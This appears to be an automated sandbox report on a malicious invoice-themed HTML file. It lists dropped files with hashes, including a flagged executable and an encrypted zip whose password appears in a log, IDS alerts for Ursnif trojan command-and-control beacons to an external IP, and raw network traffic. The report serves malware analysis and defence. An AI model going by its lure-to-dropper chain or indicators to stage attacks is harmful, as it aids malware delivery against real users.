                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winHTML@46/10@6/8
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:
                                  • Successful, ratio: 49.3% (good quality ratio 45.6%)
                                  • Quality average: 76.9%
                                  • Quality standard deviation: 31.5%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .html
                                  • Exclude process from analysis (whitelisted): cdfs.sys, MpCmdRun.exe, vhdmp.sys, WMIADAP.exe, conhost.exe, fsdepends.sys, WmiPrvSE.exe
                                  • TCP Packets have been reduced to 100
                                  • Excluded IPs from analysis (whitelisted): 142.250.203.99, 172.217.168.10, 34.104.35.123, 13.107.42.16
                                  • Excluded domains from analysis (whitelisted): fonts.googleapis.com, edgedl.me.gvt1.com, config.edge.skype.com.trafficmanager.net, fonts.gstatic.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, update.googleapis.com, clientservices.googleapis.com, l-0007.l-msedge.net, config.edge.skype.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                  TimeTypeDescription
                                  21:43:17API Interceptor31x Sleep call for process: powershell.exe modified
                                  No context
                                  No context
                                  No context
                                  No context
                                  No context
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):58152
                                  Entropy (8bit):5.034192745399562
                                  Encrypted:false
                                  SSDEEP:1536:SozV3CNBQkj2Lh4iUxpaVXflJnuvtqdZ56/zFzgVx1Uzj7vioBnNe7oZtUtQOdBi:HzV3CNBQkj2LqiUpaVXflJnuvtqdZ565
                                  MD5:3C02450B486E89D37CF9FC3D94B41DDA
                                  SHA1:E518483BA22EE1889ACD4ABF3A8DB69E1F8F5192
                                  SHA-256:3DFBB41798333B477BEF3EF266F2C1247ED019E050F93E2BAEB1072AB7060D11
                                  SHA-512:1946964DFC085F233F6EC1B3198F27812D54EFBC29D6243E5AA3D49E1691391CD0413FED04E01136838A4BD0A989FEE1B3536D9A368A9BCE996B02711D737191
                                  Malicious:false
                                  Preview:PSMODULECACHE.=...Dn.*...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1L.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-SmbBandwidthLimit........Get-SmbClientConfiguration........Get-SmbSession........Get-Sm
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):21700
                                  Entropy (8bit):5.6036932781501525
                                  Encrypted:false
                                  SSDEEP:384:btCFm0tDFemq3cSjnDju9DiJ9gRSJ3uyVI84zml+By9mJlzaBxYU:GFefcoDS9TRcuSzg/U
                                  MD5:28A091F7A2A254B9A16C2F2C9DCB4185
                                  SHA1:2EBCDD70221EB03D8AB793896C7938DB5B440CCF
                                  SHA-256:7DF996854D4A6FE5DE1812A8613D92CE5B527049756597B44E890C75C606F679
                                  SHA-512:EAD7FDEDA7EB17D97FACE165AE859CB5698EA333DE7985F86838649C9402E89FB3F4F9E6211B53CBFB4F8022226DDC5E4EEBBF8D7BCE30067D653CEDA586509C
                                  Malicious:false
                                  Preview:@...e...............................:................@..........H...............<@.^.L."My...:E..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)c.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\7za.exe
                                  File Type:ISO 9660 CD-ROM filesystem data 'CD_ROM'
                                  Category:dropped
                                  Size (bytes):428032
                                  Entropy (8bit):5.540203404749205
                                  Encrypted:false
                                  SSDEEP:12288:wNbMYzwhwZwcwvOqHYHHDOcYw9wi5eOlGHHHHuOUwLmwbj26rj+:QzwhwZwcwXHYHHmw9wqdGHHHHMwLmQjS
                                  MD5:14CB7DB8DBD6760FACC522BEE181071F
                                  SHA1:EDC0F186EE5DFB5B05D8D57D283CC49F688A6AFC
                                  SHA-256:4FC5FE464BEE34E45E7D88C634A122164F0F2B3A78AE46A8D540EEE17CF13647
                                  SHA-512:BAEAEBC0CC1680F76EA525B1CFE61F78BE217CB8541553173ACDB39CBA1332EF437303F9B76C9F9F3F91306F9BF735F04B9E966AF3A911516F2BFFA84B460DE9
                                  Malicious:false
                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\unarchiver.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1752
                                  Entropy (8bit):5.206517391375104
                                  Encrypted:false
                                  SSDEEP:48:rSJxGGGbGGGGpwGjGGGpkcGbcGdcGOGOGGGfGGGuGkibEUENT:rvPRFZ
                                  MD5:F8D48C0758B1D62F714477E9DEEDCE86
                                  SHA1:A606B1D9D59D1DAC6985E65CCED0F9FBF7C7DA12
                                  SHA-256:9384A1995EE167345A12E769A8EA6BA05DC79F190405875BAC2E4D49EB3EC540
                                  SHA-512:73E92F40F03F091B3CEE4DE3B9E382833E262795E8C13A3539C6FA891AFD7E8982C7CDA225263A2F50A4EC6B4F93B9B201CADBB3329DFE5CDCBD92723BD4B977
                                  Malicious:false
                                  Preview:10/18/2022 9:43 PM: Unpack: C:\Users\user\Downloads\8fa2db5f-d558-4ee3-8a83-68f3e15e482f.zip..10/18/2022 9:43 PM: Tmp dir: C:\Users\user\AppData\Local\Temp\krjmempf.vdz..10/18/2022 9:43 PM: Use custom PW: 758493..10/18/2022 9:43 PM: Received from standard out: ..10/18/2022 9:43 PM: Received from standard out: 7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30..10/18/2022 9:43 PM: Received from standard out: ..10/18/2022 9:43 PM: Received from standard out: Scanning the drive for archives:..10/18/2022 9:43 PM: Received from standard out: 1 file, 141939 bytes (139 KiB)..10/18/2022 9:43 PM: Received from standard out: ..10/18/2022 9:43 PM: Received from standard out: Extracting archive: C:\Users\user\Downloads\8fa2db5f-d558-4ee3-8a83-68f3e15e482f.zip..10/18/2022 9:43 PM: Received from standard out: --..10/18/2022 9:43 PM: Received from standard out: Path = C:\Users\user\Downloads\8fa2db5f-d558-4ee3-8a83-68f3e15e482f.zip..10/18/2022 9:43 PM: Received from standard
                                  Process:C:\Windows\SysWOW64\cmd.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):61952
                                  Entropy (8bit):6.1891584557780455
                                  Encrypted:false
                                  SSDEEP:768:vV+4s9C36jbgktDymekZ+bRnbSEln5IyYpamDjobj8S47:vc8ms1mibRJln5IUmDjoX07
                                  MD5:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                  SHA1:BCC5DC3222034D3F257F1FD35889E5BE90F09B5F
                                  SHA-256:4E15AA13A02798E924C63537E458A09415C48DAE0E7AFD5A3D25532A2AA935EE
                                  SHA-512:85C94763698448275AD996805FD59A3A4789BEFB79BE2175E2BBFED1CE9A2D424500DCAF42FFA225C33FE7090F0FEDF6B7BED63168FEC64D112CD09559829AFE
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...o...l...h..l..m.o.l...m..l...i..l...e...l....l...n..l.Rich.l.................PE..L...4^?..................b..........Pa............@..........................@............@.............................................hg...................0..D.......T........................... .......................lm..`....................text....a.......b.................. ..`.data................f..............@....idata...............h..............@..@.didat..............................@....rsrc...hg.......h..................@..@.reloc..D....0......................@..B................................................................................................................................................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                  Category:dropped
                                  Size (bytes):141939
                                  Entropy (8bit):7.9986767827896745
                                  Encrypted:true
                                  SSDEEP:3072:pqY/ThXYR/uQ789LZgA041W2KjuPredEZpd56iCOlEMl9U6LN:pB9oRmMaCYsMrxyu1
                                  MD5:364FE1B5ADD3C81D19BE025FC1A38142
                                  SHA1:216B91575639CB18F2153A17F1109643E8C3B6F2
                                  SHA-256:8E21F6B70A246E4C07CBBBA6D43CE7D5C1D400359058D1DEA802B1684F88B526
                                  SHA-512:310787E970F1F891F48AC4160FCDE160A3E28C2C03EF74FA7DB306C637748D6E868D836DDE640EB01958F6D47736010CB49A5B80C29DDEEC50B592E099B68A39
                                  Malicious:false
                                  Preview:PK.........RU...l.)..........5353.iso....2...M..j"lnz$.W.....e....j.m6b.....%`.K...S'.H...c..2.`m.s.S..i.:FC..x.GJ++CQH..*.,..DFq.@.......L..w...H....3.....&.6...........8......k...y.c.>...._.u..NO9........U.nTh.G..T2.8t..._.6.-." ......f....6 ro..K.D.j=..M....M.[.....ykE}...N.r:,.W.3l4.FI...6......N;... .{?k.@.m.8\?......%eIf..Rx......CQ \.L.B....J.RH.-x..S.BZ.GAHl..AF .1..H..fG.@.}.bLk..Y.8...s...4.S.....J..c9:...vv'q..[...e...T.s'..x.o.g..Nx..i.q.p.L..g......aI}<.">.DP@...943(..ehn.......&.{..Hs....o...u..|..s.,.....z..........<..R5.....-Re..#P....o.....M.06.9W8.....~&..m....4.K.f..i.6X... )..B:..^y.x........LNS.......'..O...e8A5....# m:#H$p.s..B....0......tn.&sM......R1.D.'.Zcm...mw..../..~......UQ.N.,u.~.VH..W.5NJ.L...'^.4i.M..F=4..j.(k.`.$.g_.Qb<..& X.r.{}.Z..Q....g.yU}..x..D._..eS.s..x_..4.7..+.'kfB.x..1J.z.....M.,H...;x...{-..../.ri.~Dno`....\.3.s3....swCs|..I~..*.....8LD...4.~.1.../...!..q..h...k.8.....N...S.......[I.q.@-.# !..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                  Category:dropped
                                  Size (bytes):141939
                                  Entropy (8bit):7.9986767827896745
                                  Encrypted:true
                                  SSDEEP:3072:pqY/ThXYR/uQ789LZgA041W2KjuPredEZpd56iCOlEMl9U6LN:pB9oRmMaCYsMrxyu1
                                  MD5:364FE1B5ADD3C81D19BE025FC1A38142
                                  SHA1:216B91575639CB18F2153A17F1109643E8C3B6F2
                                  SHA-256:8E21F6B70A246E4C07CBBBA6D43CE7D5C1D400359058D1DEA802B1684F88B526
                                  SHA-512:310787E970F1F891F48AC4160FCDE160A3E28C2C03EF74FA7DB306C637748D6E868D836DDE640EB01958F6D47736010CB49A5B80C29DDEEC50B592E099B68A39
                                  Malicious:false
                                  Preview:PK.........RU...l.)..........5353.iso....2...M..j"lnz$.W.....e....j.m6b.....%`.K...S'.H...c..2.`m.s.S..i.:FC..x.GJ++CQH..*.,..DFq.@.......L..w...H....3.....&.6...........8......k...y.c.>...._.u..NO9........U.nTh.G..T2.8t..._.6.-." ......f....6 ro..K.D.j=..M....M.[.....ykE}...N.r:,.W.3l4.FI...6......N;... .{?k.@.m.8\?......%eIf..Rx......CQ \.L.B....J.RH.-x..S.BZ.GAHl..AF .1..H..fG.@.}.bLk..Y.8...s...4.S.....J..c9:...vv'q..[...e...T.s'..x.o.g..Nx..i.q.p.L..g......aI}<.">.DP@...943(..ehn.......&.{..Hs....o...u..|..s.,.....z..........<..R5.....-Re..#P....o.....M.06.9W8.....~&..m....4.K.f..i.6X... )..B:..^y.x........LNS.......'..O...e8A5....# m:#H$p.s..B....0......tn.&sM......R1.D.'.Zcm...mw..../..~......UQ.N.,u.~.VH..W.5NJ.L...'^.4i.M..F=4..j.(k.`.$.g_.Qb<..& X.r.{}.Z..Q....g.yU}..x..D._..eS.s..x_..4.7..+.'kfB.x..1J.z.....M.,H...;x...{-..../.ri.~Dno`....\.3.s3....swCs|..I~..*.....8LD...4.~.1.../...!..q..h...k.8.....N...S.......[I.q.@-.# !..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                  Category:dropped
                                  Size (bytes):141939
                                  Entropy (8bit):7.9986767827896745
                                  Encrypted:true
                                  SSDEEP:3072:pqY/ThXYR/uQ789LZgA041W2KjuPredEZpd56iCOlEMl9U6LN:pB9oRmMaCYsMrxyu1
                                  MD5:364FE1B5ADD3C81D19BE025FC1A38142
                                  SHA1:216B91575639CB18F2153A17F1109643E8C3B6F2
                                  SHA-256:8E21F6B70A246E4C07CBBBA6D43CE7D5C1D400359058D1DEA802B1684F88B526
                                  SHA-512:310787E970F1F891F48AC4160FCDE160A3E28C2C03EF74FA7DB306C637748D6E868D836DDE640EB01958F6D47736010CB49A5B80C29DDEEC50B592E099B68A39
                                  Malicious:false
                                  Preview:PK.........RU...l.)..........5353.iso....2...M..j"lnz$.W.....e....j.m6b.....%`.K...S'.H...c..2.`m.s.S..i.:FC..x.GJ++CQH..*.,..DFq.@.......L..w...H....3.....&.6...........8......k...y.c.>...._.u..NO9........U.nTh.G..T2.8t..._.6.-." ......f....6 ro..K.D.j=..M....M.[.....ykE}...N.r:,.W.3l4.FI...6......N;... .{?k.@.m.8\?......%eIf..Rx......CQ \.L.B....J.RH.-x..S.BZ.GAHl..AF .1..H..fG.@.}.bLk..Y.8...s...4.S.....J..c9:...vv'q..[...e...T.s'..x.o.g..Nx..i.q.p.L..g......aI}<.">.DP@...943(..ehn.......&.{..Hs....o...u..|..s.,.....z..........<..R5.....-Re..#P....o.....M.06.9W8.....~&..m....4.K.f..i.6X... )..B:..^y.x........LNS.......'..O...e8A5....# m:#H$p.s..B....0......tn.&sM......R1.D.'.Zcm...mw..../..~......UQ.N.,u.~.VH..W.5NJ.L...'^.4i.M..F=4..j.(k.`.$.g_.Qb<..& X.r.{}.Z..Q....g.yU}..x..D._..eS.s..x_..4.7..+.'kfB.x..1J.z.....M.,H...;x...{-..../.ri.~Dno`....\.3.s3....swCs|..I~..*.....8LD...4.~.1.../...!..q..h...k.8.....N...S.......[I.q.@-.# !..
                                  File type:HTML document, ASCII text, with very long lines (63576), with CRLF line terminators
                                  Entropy (8bit):5.939221915378164
                                  TrID:
                                  • HyperText Markup Language (15015/1) 20.56%
                                  • HyperText Markup Language (12001/1) 16.44%
                                  • HyperText Markup Language (12001/1) 16.44%
                                  • HyperText Markup Language (11501/1) 15.75%
                                  • HyperText Markup Language (11501/1) 15.75%
                                  File name:Invoice_7892_18Oct.html
                                  File size:502920
                                  MD5:381a9e7c191245cc7e014e19a2c19442
                                  SHA1:f748050e061bb407d06a38009b7669783a1e0936
                                  SHA256:7d04f52af134980eef9544350ee216457910e7531a60c88ec9fa80daae59c2d3
                                  SHA512:1db4f39c0208024a33dab374ebc78b35ee763d4a686970721735bcd4458cafa146da4722cebc2d186a2ec58b8bf6c20be3edcd92696298e3c42440a4295eae51
                                  SSDEEP:12288:LTOYDDKFueroOrlZRrv6oY2JRYhkP4Ih5m:LLKkeFSB2JRLP4I3m
                                  TLSH:B6B412325BC52FBADBAC5E1540F927198FB01B0FA506588AFF633D41EBFA604410B5DA
                                  File Content Preview:<!DOCTYPE html>..<html lang="en">....<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta http-equiv="X-UA-Compatible" content="ie=edge">.. <title></title>..</head>....<body>..<style>
                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  192.168.2.531.41.44.19449740802033204 10/18/22-21:44:26.183837TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4974080192.168.2.531.41.44.194
                                  192.168.2.531.41.44.19449740802033203 10/18/22-21:44:26.183837TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4974080192.168.2.531.41.44.194
                                  192.168.2.58.8.8.860284532023883 10/18/22-21:44:26.088642UDP2023883ET DNS Query to a *.top domain - Likely Hostile6028453192.168.2.58.8.8.8
                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 18, 2022 21:43:08.506016016 CEST49704443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:08.506071091 CEST44349704142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:08.506139994 CEST49704443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:08.506352901 CEST49705443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:08.506424904 CEST44349705142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:08.506531000 CEST49705443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:08.507127047 CEST49706443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:08.507174015 CEST44349706142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:08.507250071 CEST49706443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:08.507592916 CEST49707443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:08.507631063 CEST44349707142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:08.507713079 CEST49707443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:08.508866072 CEST49704443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:08.508898020 CEST44349704142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:08.521120071 CEST49705443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:08.521193981 CEST44349705142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:08.521450996 CEST49706443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:08.521485090 CEST44349706142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:08.521917105 CEST49707443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:08.521975040 CEST44349707142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:08.609039068 CEST44349705142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:08.610244989 CEST44349706142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:08.611632109 CEST49706443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:08.611685991 CEST44349706142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:08.612345934 CEST44349706142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:08.612473011 CEST49706443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:08.614801884 CEST44349706142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:08.614922047 CEST49706443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:08.617444038 CEST49705443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:08.617510080 CEST44349705142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:08.618736029 CEST44349705142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:08.618825912 CEST49705443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:08.619692087 CEST44349705142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:08.619780064 CEST49705443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:08.635802984 CEST44349704142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:08.638978004 CEST44349707142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:08.677793026 CEST49704443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:08.714988947 CEST49707443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:09.042928934 CEST49707443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:09.042969942 CEST44349707142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:09.043104887 CEST49704443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:09.043163061 CEST44349704142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:09.044809103 CEST44349707142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:09.044888020 CEST44349707142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:09.044924974 CEST49707443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:09.046695948 CEST44349704142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:09.046839952 CEST49704443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:09.112967968 CEST49707443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:09.389894962 CEST49704443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:09.389936924 CEST44349704142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:09.390153885 CEST49704443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:09.390158892 CEST44349704142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:09.390270948 CEST44349704142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:09.390851021 CEST49707443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:09.390878916 CEST44349707142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:09.391077995 CEST49706443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:09.391098022 CEST44349706142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:09.391174078 CEST49705443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:09.391192913 CEST44349705142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:09.391275883 CEST49706443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:09.391285896 CEST44349706142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:09.391314983 CEST44349706142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:09.391330004 CEST44349707142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:09.391498089 CEST44349705142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:09.427165031 CEST44349706142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:09.427294970 CEST49706443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:09.427319050 CEST44349706142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:09.427547932 CEST44349706142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:09.427625895 CEST49706443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:09.438929081 CEST49706443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:09.438960075 CEST44349706142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:09.444329977 CEST44349704142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:09.444420099 CEST49704443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:09.444458008 CEST44349704142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:09.444674015 CEST44349704142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:09.444744110 CEST49704443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:09.477962971 CEST49705443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:09.478001118 CEST44349705142.250.203.110192.168.2.5
                                  Oct 18, 2022 21:43:09.482167006 CEST49704443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:09.482219934 CEST44349704142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:09.510960102 CEST49707443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:09.511009932 CEST44349707142.250.203.109192.168.2.5
                                  Oct 18, 2022 21:43:09.579071999 CEST49705443192.168.2.5142.250.203.110
                                  Oct 18, 2022 21:43:09.611720085 CEST49707443192.168.2.5142.250.203.109
                                  Oct 18, 2022 21:43:10.758714914 CEST49712443192.168.2.5142.250.203.100
                                  Oct 18, 2022 21:43:10.758807898 CEST44349712142.250.203.100192.168.2.5
                                  Oct 18, 2022 21:43:10.758898973 CEST49712443192.168.2.5142.250.203.100
                                  Oct 18, 2022 21:43:10.759182930 CEST49712443192.168.2.5142.250.203.100
                                  Oct 18, 2022 21:43:10.759218931 CEST44349712142.250.203.100192.168.2.5
                                  Oct 18, 2022 21:43:10.821932077 CEST44349712142.250.203.100192.168.2.5
                                  Oct 18, 2022 21:43:10.835352898 CEST49712443192.168.2.5142.250.203.100
                                  Oct 18, 2022 21:43:10.835439920 CEST44349712142.250.203.100192.168.2.5
                                  Oct 18, 2022 21:43:10.838835001 CEST44349712142.250.203.100192.168.2.5
                                  Oct 18, 2022 21:43:10.838996887 CEST49712443192.168.2.5142.250.203.100
                                  Oct 18, 2022 21:43:10.863576889 CEST49712443192.168.2.5142.250.203.100
                                  Oct 18, 2022 21:43:10.863647938 CEST44349712142.250.203.100192.168.2.5
                                  Oct 18, 2022 21:43:10.863977909 CEST44349712142.250.203.100192.168.2.5
                                  Oct 18, 2022 21:43:10.979079962 CEST49712443192.168.2.5142.250.203.100
                                  Oct 18, 2022 21:43:10.979140997 CEST44349712142.250.203.100192.168.2.5
                                  Oct 18, 2022 21:43:11.088423967 CEST49712443192.168.2.5142.250.203.100
                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 18, 2022 21:43:07.166143894 CEST4917753192.168.2.58.8.8.8
                                  Oct 18, 2022 21:43:07.206505060 CEST53491778.8.8.8192.168.2.5
                                  Oct 18, 2022 21:43:07.384866953 CEST4972453192.168.2.58.8.8.8
                                  Oct 18, 2022 21:43:07.412889957 CEST53497248.8.8.8192.168.2.5
                                  Oct 18, 2022 21:43:10.737869978 CEST6097553192.168.2.58.8.8.8
                                  Oct 18, 2022 21:43:10.755620956 CEST53609758.8.8.8192.168.2.5
                                  Oct 18, 2022 21:44:10.796859980 CEST5847253192.168.2.58.8.8.8
                                  Oct 18, 2022 21:44:10.816634893 CEST53584728.8.8.8192.168.2.5
                                  Oct 18, 2022 21:44:26.088641882 CEST6028453192.168.2.58.8.8.8
                                  Oct 18, 2022 21:44:26.107964039 CEST53602848.8.8.8192.168.2.5
                                  Oct 18, 2022 21:44:46.381352901 CEST5090253192.168.2.58.8.8.8
                                  Oct 18, 2022 21:44:46.399236917 CEST53509028.8.8.8192.168.2.5
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Oct 18, 2022 21:43:07.166143894 CEST192.168.2.58.8.8.80xb46cStandard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                  Oct 18, 2022 21:43:07.384866953 CEST192.168.2.58.8.8.80x3194Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                  Oct 18, 2022 21:43:10.737869978 CEST192.168.2.58.8.8.80x61d4Standard query (0)www.google.comA (IP address)IN (0x0001)false
